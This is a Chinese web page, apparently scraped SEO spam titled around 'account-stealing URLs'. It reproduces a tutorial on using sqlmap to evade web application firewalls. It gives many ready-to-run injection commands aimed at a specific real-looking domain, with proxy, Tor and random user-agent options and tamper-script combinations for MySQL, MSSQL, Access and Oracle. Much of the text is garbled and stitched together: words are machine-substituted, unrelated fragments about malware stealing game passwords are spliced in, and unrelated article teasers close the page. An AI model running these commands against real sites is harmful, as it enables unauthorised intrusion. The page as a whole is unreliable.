有用盗号网址:运用sqlmap 绕过防火墙进行注入测验

访客5年前黑客工具542

现在的 *** 环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,乃至封闭我们的主机IP,所以这个时分,我们就要考虑怎样进行绕过,到达注入的方针。由于现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文依据sqlmap 进行绕过注入测验,介绍至今依然有用有用的技巧,以下战略在特定的环境能够成功绕过,详细是否绕过,请细心检查输出的信息。

0x01 承认WAF

     首要我们判别该We一同,新建了一个 administrator 假超级用户帐号,并设置了一个100位长的暗码,此用户不属于任何组,不具有任何权限,用于威逼侵犯者,俗称“骗局帐号”。

b 服务器是否被WAF/IPS/IDS保护着。这点很简单完成,由于我们在漏扫或许运用专门东西来检测是否有WAF,这个检测,在nmap 的NSE,或许WVS的战略或许APPSCAN的战略中都有,我们能够运用这些来判别。在此我们,也介绍运用sqlmap 进行检测是否有WAF/IPS/IDS

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10  --check-waf#备选

0x02 运用参数进行绕过

root@kali:~# sqlmap -u &q }uot;http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #运用恣意浏览器进行绕过,尤其是在WAF装备不妥的时分

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#运用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #运用长的延时来防止触发WAF的机制,这办法比较耗时

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#运用署理进行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy#制止运用系统的署理,直接衔接进行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session#清空会话,重构注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex#或许运用参数 --no-cast ,进行字符码转化

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --mobile #对移动端的服务器进行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # 匿名注入

0x03 运用脚本介绍1 运用格局:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#脚本A,脚本B 

2 脚本总类

01 apostrophemask.py#用utf8替代引号;Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

02 equaltolike.py#MSSQL * SQLite中like 替代等号;Example:  Input: SELECT * FROM users WHERE id=1 ;Output: SELECT * FROM users WHERE id LIKE 1

03 greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号;Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'

04 space2hash.py#空格替换为#号 随机字符串 以及换行符;Input: 1 AND 9227=9227;Output: 1%2 *** TTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

05 apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号;

06 halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个要害字之前增加mysql版别谈论;

07 space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;

08 appendnullbyte.py#Microsoft Access在有用负荷完毕方位加载零字节字符编码;Example: ('1 AND 1=1') '1 AND 1=1%00'

09 ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换相似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

10 space2mssqlblank.py(mssql)#mssql空格替换为其它空符号

11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

12 space2mssqlhash.py#mssql查询中替换空格

13 modsecurityversioned.py#(mysql中过滤空格,包括完好的查询版别注释;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'

14 space2mysqlblank.py#(mysql中空格替换其它空白符号

15 between.py#MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0顶用between替换大于号(>)

16 space2mysqldash.py#MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

17 multiplespaces.py#环绕SQL要害字增加多个空格;Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'

18 space2plus.py#用+替换空格;Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'

19 bluecoat.py#MySQL 5.1, SGOS替代空格字符后与一个有用的随机空白字符的SQL句子。 然后替换=为like

20 nonrecursivereplacement.py#两层查询句子。替代predefined SQL要害字with表明 suitable for替代(例如 .replace(“SELECT”、””)) filters

21 space2randomblank.py#替代空格字符(“”)从一个随机的空白字符可选字符的有用集

22 sp_password.py#追加sp_password’从DBMS日志的主动含糊处理的26 有用载荷的结尾

23 chardoubleencode.py#双url编码(不处理以编码的)

24 unionalltounion.py#替换UNION ALL SELECT UNION SELECT;Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

25 charencode.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;

26 randomcase.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写

27 unmagicquotes.py#宽字符绕过 GPC addslashes;Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

28 randomcomments.py#用/**/切割sql要害字;Example:‘INSERT’ becomes ‘IN//S//ERT’

29 charunicodeencode.py#ASP,ASP.NET中字符串 unicode 编码;

30 securesphere.py#追加特制的字符串;Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

31 versionedmorekeywords.py#MySQL >= 5.1.13注释绕过

32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

33 halfversionedmorekeywords.py#MySQL < 5.1中要害字前加注释

 

0x04脚本参数组合战略绕过1 mysql绕过:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

补白:这些组合战略能够依据注入的反应信息,及时调整组合战略

2 MSSQL:

root@kali:~# sqlmap -u "http://yiliao.kingd }ee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --time-sec=120  --tamper=space2mssqlblank.py,securesphere.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --tamper=unionalltoun需求内嵌代码ion.py,base64encode.p

3 ms access:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent  --tamper=appendnullbyte.py,space2plus.py

root@kali:~# sqlmap -u "http://yiliao.kin

◆搜索功用:能对指定组或许整个数据库进行搜索。

gdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent --hpp  --tamper=chardoubleencode.py4 Oracle:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0&r目录dquo; --hpp --tamper=charunicodeencode.py,chardoubleencode.py

5 主张:

      由于WAF或许选用白名单规矩,所以关于挑选哪种战略,重点是依据-v 3 提示的信息进行判别,能够抓取干流的浏览器的user-agent ,s恰当的延时,加上注入字符转化---大小写、空格、字符串、注释、加密等等办法

      鉴于参数和32种脚本,在我们平常的注入,这些通过不同的多重组合来进行测验,这个测验或许比较耗时

有用盗号网址:运用sqlmap 绕过防火墙进行注入测验

Pend: 417/0__a *** __("lea eax,[ebp+0x2e]");功用模块使用sqlmap 绕过防火墙进行注入测试

有效盗号网址分析之前,我们需求理清思路,逐步分析,慢慢行成一套归于自己的分析流程。通过SystemTimeToFileTime()将SystemTime转化为FileTime。这是将这个样本APP激活成设备管理器,在meta-data中知道device_admin_sample.xml文件存放了,激活设备管理器央求打开的战略,并且一旦战略被触发就会调用这个广播接收器中重写的办法,如图7.png,都会打印一条日志:

Xmanager Enterprise Build 1236nt!PspAllocateProcess+0xb4blong ptrace(int request, pid_t pid, void *addr, void *data);有效盗号网址

请注意,我写这篇文章只是出于教育目的哦——悉数因此带来的成果和本文作者、译者无关。

一、 前语0xbfff0000 XX XX XX XX 使用sqlmap 绕过防火墙进行注入测试

有效盗号网址运用私有目录被束缚访问(0700),文件所有者将无法通过设置私有文件访问办法为MODE_WORLD_READABLE与MODE_WORLD_WRITEABLE来打开私有文件的读写权限;此外,通过file:///URI也将无法访问到运用包之外的途径;一同DownloadManager将不能通过文件名来同享私有文件的信息。若要在运用间同享文件,开发者能够发送一项content://URI,并授权URI的暂时访问权限。进行此授权的最简略办法是运用FileProvider类。这一改动有用保证了同享文件的安全问题。7.1 中间人侵犯输出: 简介

[Bash shell] 纯文本检查 拷贝代码脚本大致内容:基本信息核算(IP地址、MAC地址、端口信息、服务信息等)、主机安全检查(包括等保三级要求主机相关的检查点)、系统功用核算(暂时未参与分析)、恶意代码、程序检查等检查点。 有效盗号网址

drwxr-xr-x 2 root root 4096 Sep 14 03:13 20140914

使用sqlmap 绕过防火墙进行注入测试

2.信息收集

通过查找游戏的主页面的类”88369game”来判别我们输入的用户名是否有用。假设找到游戏的主界面恶意dll才会发送用户的游戏账号和暗码,假设没有查找到游戏的界面就不会发送

假设没有换行的话,n其实是能够省掉的,但是引号必不行少。下面这样就不行: if (pThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG32)
本文标题:有用盗号网址:运用sqlmap 绕过防火墙进行注入测验

相关文章

虫群之心战役(星际2虫群之心战役攻略)

  星际2虫群之心战役第五关任务许志安出轨杀虫巢共有7只,本任务有两个支线眼袋消除法任务,一个是摧毁3座星轨指挥总部杨乐乐闺蜜,另一个任务是收集虫族生物质,下夜莺的歌声面给大家带来星际2虫群之心战役。...

定位手机位置,黑客修电脑软件有联系方式吗,怎么找黑客查询微信

emMsg('插件上传失利'); 16-sT TCP衔接扫描2.标题方法:不同于用户态的pwn,kernel pwn不再是用python长途链接打payload拿shell,而...

给老人买什么礼物(40件送给父母长辈的实用礼物清单)

给老人买什么礼物(4百思特网0件送给父母长辈的实用礼物清单) 双11”就要到了,已经百思特网准备好“买买买”了?为自己花钱的同时,也别忘了尽尽孝心百思特网,帮不会上网的父母长辈添置一些实用物品吧。4...

什么是中国传统文化(中国传统文化的基本理念

什么是中国传统文化(中国传统文化的基本理念

传统文化知识,你知道多少? 五行、八卦指什么? 四书、五经包括哪几部? 唐宋八大家、竹林七贤都有谁? 六根清净指的是哪六根? 三山、五岳在哪儿? 答不出的赶紧戳图补课!了解、传承中华文化,...

内部链接有什么作用?分享内部链接的4大作用

外链能够为网址传送权重值进而提升百度权重并间歇性的提高关键字排名和靠前。相反,内链的功效更奇怪,提议大中小型和商业网站都需要有效的分配好的网站内链,尤其是商业网站。下边就来简易的说一下内链的功效吧。...

未成年犯分级预防什么意思?未成年犯分级预防有哪些好处

未成年犯分级预防什么意思?未成年犯分级预防有哪些好处

近年来,针对未成年人特点采取更有针对性的措施,从而有效预防未成年人犯罪,成为社会各界高度关注的话题。导致未成年人犯罪的问题根源在哪里?如何对涉罪未成年人实施干预或矫治?2020年1月13日晚播出的《成...